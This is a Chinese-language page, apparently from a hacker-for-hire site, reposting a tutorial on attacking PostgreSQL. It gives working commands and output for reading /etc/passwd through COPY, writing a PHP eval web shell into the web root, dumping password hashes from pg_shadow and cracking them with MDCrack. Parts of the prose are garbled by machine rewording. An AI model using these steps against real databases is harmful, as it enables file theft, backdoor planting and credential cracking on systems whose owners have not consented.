靠谱黑客联系方式

免责声明
[db:摘要]

1.通过copy读文件

mickey@pentest:~/Pentest/crack/mdcrack$ psql -h 127.0.0.1 -U postgres
用户 postgres 暗码:
psql (8.4.2)
SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)
Type “help” for help.

postgres=# create table file(line text);
CREATE TABLE

postgres=# copy file from “/etc/passwd” with delimiter “:”;
ERROR:  extra data after last expected column
布景:  COPY file, line 1: “root:x:0:0:root:/root:/bin/bash”

失利,是由于delimiter的问题,假如要读的文件包括有你指定的delimiter,则会失利,

postgres=# create table file (line text);
CREATE TABLE
postgres=# copy file from “/etc/passwd” with delimiter E”t”;
COPY 47
postgres=# select * from file;

这次就成功了,用pg_read_file(),在实践浸透中不太实际,由于他约束目录访问了。

2.写一句话到web目录
postgres=# create table file(line text);
CREATE TABLE
postgres=# insert into file values (E”<?php eval($_POST[”mickey”]; ?>”);
INSERT 0 1
postgres=# copy file(line) to “/var/www/one.php”;
COPY 1

3.破解数据库账户

postgres=# SELECT usename, passwd FROM pg_shadow;
usename  |               passwd              
———-+————————————-
postgres | md518d0d1643114d8b58e27c77600a1c658
(1 row)

加密算法为md5(password+username),以这个为例,暗码为mickey,用户名为postgres,兼并后为mickeypostgres,再通过md5加密后,就为18d0d1643114d8b58e27c77600a1c658

能够运用MDCRACK来破解

mickey@pentest:~/Pentest/crack/mdcrack$ wine MDCrack-sse.exe –algorithm=MD5 –append=postgres 18d0d1643114d8b58e27c77600a1c658

转自mickey博客,由网络安全攻防研究室(www.91ri.org) 信息安全信息安全小组收集整理.

  • 发表于 2020-01-11 02:36
  • 阅读 ( 32 )
  • 分类:黑客接单

相关问题

0 条评论

请先 登录 后评论
不写代码的码农
黑客

3171 篇文章

作家榜 »

  1. 黑客 3171 文章